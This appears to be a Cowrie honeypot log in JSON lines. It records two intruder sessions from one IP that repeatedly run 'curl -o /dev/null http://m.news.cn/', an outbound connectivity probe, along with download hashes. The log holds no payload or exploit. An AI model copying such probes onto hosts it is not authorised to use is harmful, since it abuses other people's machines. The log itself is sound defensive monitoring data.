{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.759278Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.760738Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.784238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.785666Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.819584Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.821576Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.841011Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.842345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.856367Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.858479Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.864712Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.866052Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.903488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.904968Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.909547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.910736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.933088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.934563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.945424Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.946739Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.972579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.974165Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.981125Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.982944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.990578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.992143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.026797Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.029526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.031102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.040739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.041713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.062791Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.076922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.078345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.081734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.082824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.091483Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.105325Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.108414Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.119010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.128123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.129437Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.134172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.135410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.152391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.154013Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.173566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.174869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.177734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.178579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.191769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.194026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.225402Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.227710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.265435Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.295043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.296127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.298010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.298975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.313077Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.330567Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.340916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.342069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.347197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.348249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.379933Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.380806Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.385091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.385832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.419868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.420754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.423486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.424177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.447843Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.449604Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.454839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.455739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.462628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.463537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.498619Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.500119Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.537375Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.542868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.543779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.549799Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.550879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.561325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.572525Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.598053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.599054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.604093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.604928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.626605Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.646792Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.652936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.653735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.658046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.658797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.699776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.700852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.706782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.707649Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.760685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.761685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.766428Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.767295Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.783340Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.783949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.793067Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.795161Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
